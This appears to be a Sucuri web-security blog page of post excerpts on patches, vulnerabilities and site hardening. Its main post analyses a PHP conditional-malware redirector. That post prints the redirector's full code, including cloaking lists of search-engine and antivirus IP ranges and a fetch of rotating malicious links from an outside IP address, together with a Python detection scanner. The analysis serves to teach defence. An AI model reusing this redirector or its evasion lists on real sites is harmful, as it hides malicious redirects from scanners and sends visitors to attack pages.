Microsoft XML Core Service Zero Day Vulnerability Being Targeted

On June 12th we reported the release of a new Microsoft Security Advisory. It was of specific interest to us because it was exploitable via web-based malware and was classified as a zero-day vulnerability.

To that point, today, NakedSecurity reported that the Blackhole Exploit Kit has been updated with a module designed to exploit that vulnerability.

Blackhole Exploit Kit


Read More

WordPress Update – 3.3.3 and 3.4.1 Patches Released!!

Well, it was only a few weeks ago, but today two new patches were released: 3.3.3 and 3.4.1.

The good news is that, as they are patches, the updates should be fairly straightforward and should not cause many, if any, issues. It is important to note, though, that this is a Maintenance and Security release. On their official post they highlight the following items:

  • Fixes an issue where a theme’s page templates were sometimes not detected.
  • Addresses problems with some category permalink structures.
  • Better handling for plugins or themes loading JavaScript incorrectly.
  • Adds early support for uploading images on iOS 6 devices.
  • Allows for a technique commonly used by plugins to detect a network-wide activation.
  • Better compatibility with servers running certain versions of PHP (5.2.4, 5.4) or with uncommon setups (safe mode, open_basedir), which had caused warnings or in some cases prevented emails from being sent.


Read More

Uploadify, Uploadify and Uploadify – The New TimThumb?

We are seeing a lot of noise again regarding the Uploadify script vulnerabilities affecting some WordPress themes/plugins. If you are not familiar, Uploadify allows anyone to upload anything they want to your site without any authentication.

Very, very useful, no? Maybe, but at what cost? If a bad guy/gal knows that you have the Uploadify script, they can upload anything they want too (backdoors included) and hack your site.

First, Uploadify is nothing new. When we were reporting on the TimThumb vulnerabilities, we were also notifying everyone about the issues with Uploadify.

Been Around

  1. In October of 2011 we warned everyone to remove and check for Uploadify: Remove Unused/Testing/Debug Software From Your Site
  2. We put out a post in August of 2011 listing themes affected by TimThumb; we also listed the ones using Uploadify as unsafe: Timthumb Security Vulnerability – List of Themes
  3. An oldie but a goodie, TimThumb (Tip of the Iceberg), in which Uploadify was also covered

Read More

Plesk Vulnerability Leading to Malware

Our friends over at Unmask Parasites posted two very good reports about a mix of Plesk vulnerabilities being used to mass-compromise websites and redirect them to the Blackhole Exploit Kit.

The first issue is that old versions of Plesk store passwords in clear text (yes, clear text in 2012). The second is a remote SQL vulnerability found in old versions of Plesk that allows attackers to retrieve those passwords.

clear text password + database dump = Mass password leaks

This has possibly allowed attackers to gain access to a large number of passwords and hosts/sites. We recommend reading those two posts to understand the issue:

Read More

How To: Lock Your Site by Enabling a Second Layer of Authentication

I put together a post this weekend about my personal experience installing a WordPress site on a clean server. In the process of hardening the administration panel I found myself doing something that I don’t see discussed much – enabling Basic Access Authentication.

That got me thinking about putting together this post to educate our readers on a quick and easy method of adding a second layer of authentication to their own administrative panels. What’s great about this is that it can be applied to any web application running on an Apache HTTP Server, including:

  • WordPress
  • Joomla
  • Drupal
  • osCommerce
  • and more…


Read More

Sucuri Labs Weekly Review – June 22nd – 2012

Have you checked out Sucuri Labs? We have been adding a daily feed of the top web-based malware samples that we find every day, as well as the number of compromised sites.

We separate the data into three main categories:

  • Hidden iframes
  • Conditional redirections (generally done via .htaccess)
  • Encoded JavaScript

This helps us understand how sites are getting compromised and how the malware is being executed in the browser.

Read More

Understanding Conditional Malware – IP Centric Variation

In today’s web malware landscape you need to take a minute to familiarize yourself with a concept known as conditional malware.

As implied by the name, it’s malware that only works when specific rules are met. Those rules can range from specific IP ranges to the time of day. They are very tricky and, as you would expect, evolve every day. Often when someone calls or emails us asking why our free scanner, SiteCheck, is not picking something up, this is the cause. As of late, the PHARMA hack has been notorious for using conditional infections, making it exceptionally difficult to detect via HTTP.

In this post we’ll take a look at a specific type of conditional malware that applies rules around which IPs it will not display to. It’s the same string we wrote about earlier, which caused us to flag Google.com as malware... oops. :)

My goal is to keep it high level; I’m not going to get crazy with the code, but I do want to take some time to walk through it so that you can learn to detect similar infections in your environment.

Dissecting The Code


User Agents

The first thing you notice when you see the infection is the use of $user_agent_to_filter. This array tells the code which user agents to single out: a request whose user agent matches any one of these patterns is handled differently:

$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#Safari#i', '#HTTrack#i', '#Chrome#i', '#Mac#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i', '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i', '#www\.cys\.ru#i', '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i', '#CFNetwork#i', '#ConveraCrawler#i', '#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i', '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i', '#IRLbot#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
'#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
'#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
'#Yandex#i', '#Yanga#i', '#Yeti#i', '#msnbot#i', '#spider#i', '#yahoo#i', '#jeeves#i', '#google#i', '#altavista#i',
'#scooter#i', '#av\s*fetch#i' );

Filtering IPs

The next thing you notice is the long array of IPs. In essence, if your IP equals one of these values or falls within one of these ranges, a different action will occur. How nice of them to actually comment on which ranges belong to search engines and antivirus providers.

$stop_ips_masks = array(
"66\.249\.[6-9][0-9]\.[0-9]+", // Google NetRange: 66.249.64.0 – 66.249.95.255
"74\.125\.[0-9]+\.[0-9]+", // Google NetRange: 74.125.0.0 – 74.125.255.255
"65\.5[2-5]\.[0-9]+\.[0-9]+", // MSN NetRange: 65.52.0.0 – 65.55.255.255,
"74\.6\.[0-9]+\.[0-9]+", // Yahoo NetRange: 74.6.0.0 – 74.6.255.255
"67\.195\.[0-9]+\.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 – 67.195.255.255
"72\.30\.[0-9]+\.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 – 72.30.255.255
"38\.[0-9]+\.[0-9]+\.[0-9]+", // Cuill: NetRange: 38.0.0.0 – 38.255.255.255
"93\.172\.94\.227", // MacFinder
"212\.100\.250\.218", // Wells Search II
"128\.103\.64\.[0-9]+", // StopBadWare
"150\.70\.[0-9]+\.[0-9]+", // TrendMicro
"216\.104\.[0-9]+\.[0-9]+", // TrendMicro
"207\.46\.[0-9]+\.[0-9]+", // Microsoft
"157\.55\.[0-9]+\.[0-9]+", // Microsoft
"213\.180\.[0-9]+\.[0-9]+", // Yandex
"217\.23\.[0-9]+\.[0-9]+", // Kaspersky
"91\.103\.64\.[0-9]+", // Kaspersky
"215\.5\.80\.[0-9]+", // Kaspersky
"195\.168\.53\.[0-9]+", // NOD32
"220\.255\.1\.[0-9]+", // domain-tool.com
"69\.28\.58\.[0-9]+", // Symantec
"66\.147\.244\.[0-9]+", // freepcsecurity.co.uk
"128\.111\.48\.[0-9]+", // wepawet.cs.ucsb.edu
"209\.9\.239\.[0-9]+", // jsunpack.jeek.org
"62\.67\.194\.[0-9]+", // support.clean-mx.de
"195\.214\.79\.[0-9]+", // support.clean-mx.de
"97\.74\.141\.[0-9]+", // malwareurl.com
"213\.171\.194\.[0-9]+", // spamhaus
"139\.146\.167\.[0-9]+", // malwaredomains
"88\.160\.229\.[0-9]+", // malwaredomains
"69\.162\.79\.[0-9]+", // malwarebytes
"66\.40\.145\.[0-9]+", // bitdefender
"66\.223\.50\.[0-9]+", // bitdefender
"204\.14\.90\.[0-9]+", // spywarewarrior.com
"92\.123\.155\.[0-9]+", // Sophos
"213\.31\.172\.[0-9]+", // Sophos
"143\.215\.130\.[0-9]+", // Malwaredomainlist
"150\.70\.172\.[0-9]+", // TrendNet
"64\.88\.164\.[0-9]+", // AVG
"102\.157\.192\.[0-9]+", // ZeusTracker
"109\.65\.41\.[0-9]+", // ZeusTracker
"110\.77\.248\.[0-9]+", // Virustotal
"59\.6\.145\.[0-9]+", // Virustotal
"67\.124\.37\.[0-9]+", // Virustotal
);

The Rule (a.k.a. The Condition)

If Condition is Met, then..

Once the user agents have been defined and the “bad” IPs flagged, you have the condition. In this instance what it says is: if the request comes from any of the IPs identified above (or from any of the filtered user agents), redirect it to http://www.google.com. How annoying is that!!!!

foreach ( $stop_ips_masks as $k=>$v )
{
    if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']) )
        $is_bot = TRUE ;
}
if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) )
{
    header("Location: http://www.google.com/");
    die();
}

If Condition is Not Met, then…

Now that we know what it does if the condition is met, let’s look at what it does if the condition is not met.

set_time_limit(30);

$cache = dirname(__FILE__) . '/link.cache';

$link = @file_get_contents($cache);

if (strlen($link) < 20 || (time()-@filemtime($cache)) > 60)
{
    $link = @file_get_contents('http://88.198.28.38/api.php?action=link&aid=658&fid=3714&hash=beca79b043b1b5e25d514191ce8a691c291b8626');

    if (strlen($link) > 20)
    {
        $fp = @fopen ($cache, 'w');
        @fputs($fp, $link);
        @fclose($fp);
    }
}

header ('Location: ' . $link);
exit;

As you can see, if the condition is not met, the incoming request continues down the yellow brick road and ends up at a new domain, courtesy of this:

@file_get_contents('http://88.198.28.38/api.php?action=link&aid=658&fid=3714&hash=beca79b043b1b5e25d514191ce8a691c291b8626');

That little API decides which URL to hand to the request. It actually rotates the domains, so if you hit it multiple times you’re not likely to get the same one.

What Did We Learn


Hopefully you gained an appreciation for what conditional malware is all about and the challenges of catching it with HTTP crawlers.

This specific instance covers only one type; there are many permutations of this floating around the interwebs. If you’re a client, we highly recommend enabling the server-side scanner, as it’s not restricted by the limitations of HTTP crawlers.
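To show what a server-side check can catch that an HTTP crawler cannot, here is an added example in Python (not code from the original post, and not Sucuri's scanner): a small scanner that walks a directory of PHP files and flags those carrying the traits of the redirector dissected above. The indicator regexes, their weights, the threshold, the placeholder address 192.0.2.1 and the two sample files are my own constructions.

```python
import os
import re
import tempfile

# Indicators from the redirector dissected above, as (name, regex, weight). A file is
# reported once its weights sum to THRESHOLD, so a lone Location header is not enough.
INDICATORS = [
    ("ua-filter-array", re.compile(r"\$user_agent_to_filter\s*=\s*array"), 3),
    ("ip-mask-array", re.compile(r"\$stop_ips_masks\s*=\s*array"), 3),
    ("remote-addr-regex", re.compile(r"preg_match\s*\(.*\$_SERVER\[.REMOTE_ADDR.\]"), 2),
    ("ua-replace-marker", re.compile(r"preg_replace\s*\(\s*\$user_agent_to_filter"), 2),
    ("remote-link-fetch", re.compile(r"file_get_contents\s*\(\s*['\"]https?://[^'\"]*action=link"), 3),
    ("redirect-header", re.compile(r"header\s*\(\s*['\"]Location:"), 1),
]
THRESHOLD = 5

def scan_source(src):
    """Return (score, [matched indicator names]) for one PHP source string."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(src)]
    return sum(w for name, _, w in INDICATORS if name in hits), hits

def scan_tree(root):
    """Walk root; return {relative path: hits} for PHP files scoring >= THRESHOLD."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for fn in (f for f in files if f.endswith((".php", ".inc"))):
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, hits = scan_source(fh.read())
            if score >= THRESHOLD:
                flagged[os.path.relpath(path, root)] = hits
    return flagged

# Constructed samples: a cut-down copy of the redirector with a placeholder
# address (192.0.2.1) in place of the real API host, and a benign login redirect.
INFECTED = r"""<?php
$user_agent_to_filter = array('#Yahoo!\s*Slurp#i', '#google#i');
$stop_ips_masks = array("66\.249\.[6-9][0-9]\.[0-9]+");
foreach ($stop_ips_masks as $v) if (preg_match('#^'.$v.'$#', $_SERVER['REMOTE_ADDR'])) $is_bot = TRUE;
if ($is_bot || strpos(preg_replace($user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT']), '-NO-WAY-') !== FALSE) { header("Location: http://www.google.com/"); die(); }
$link = @file_get_contents('http://192.0.2.1/api.php?action=link&aid=0'); header('Location: ' . $link); exit;
"""
CLEAN = "<?php\nif (!is_user_logged_in()) { header('Location: /login'); exit; }\n"

def demo():
    # Write both samples into a temporary tree and scan it; only header.php is flagged.
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("header.php", INFECTED), ("functions.php", CLEAN)):
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        return scan_tree(root)
```

Point scan_tree() at a site's document root to run it for real; the benign login redirect scores 1 and stays below the threshold, while the redirector trips every indicator.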

A couple of telltale signs that something is wrong are comments like these:

  • I am being redirected on my mobile device but not on your machine
  • I am being redirected in my Chrome browser but not in Firefox
  • I remember seeing something a day ago but now it’s not there

Keep an eye out for questions or comments that resemble any of those points. If you hear them, you now know that you’re likely dealing with some type of conditional malware.


If you have any questions pertaining to this post please feel free to email us at info@sucuri.net.

Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately?

Today Google released a nice post: Safe Browsing – Protecting Web Users for 5 Years and Counting. In it they provide a good summary of what they have been up to the past 5 years with their Safe Browsing program.

Here are some interesting data points:

  • 600 million users are protected
  • 9,500 new malicious websites are found every day
  • 12 – 14 million Google Search queries show malicious warnings
  • Warnings are provided for about 300,000 downloads per day
  • Thousands of notifications are sent daily to webmasters
  • Thousands of notifications are sent daily to Internet Service Providers (ISPs)


Read More

How To: Stop The Hacker By Hardening WordPress

Every day we service hundreds of clients, and the question is always asked:

“How do you stop these hackers!!!”

Unfortunately, it’s perhaps the hardest thing for most to explain and understand. That being said, this post will be one of a series on what end-users can do to help reduce their threat landscape.

This post will augment our previous post, Ask Sucuri: “How to Stop The Hacker and ensure Your Site Is Locked!!”, but hopefully provide you with more tangible takeaways. It will also leverage guidance recently shared at a conference for WordPress enthusiasts – WordCamp Orange County 2012.

The Presentation


Here is the presentation in its entirety. Very appropriately, it’s titled WordPress Security – Knowledge is Power, mainly because of the emphasis we put on empowering the end-user with as many tools as possible to make them more effective at protecting themselves.

Give a man a fish and you feed him for a day. Teach a man to fish and you feed him a lifetime. – Chinese proverb


Read More

Joomla 2.5.5 released (security update)

Joomla 2.5.5 was just released today, with a few bugs fixed and 2 important security updates for a privilege escalation and an information disclosure issue:

1- Privilege escalation

A high-severity security issue that allows unprivileged users to get admin access to a site running Joomla.

2- Information Disclosure

A low-severity security issue that leaks internal information about the database, internal paths and PHP info.

More information about this release here: Joomla 2.5.5 released

Remember, the leading cause for web site compromises is outdated software! So as a web site owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

SiteCheck was also updated to alert users not running version 2.5.5 on their Joomla sites.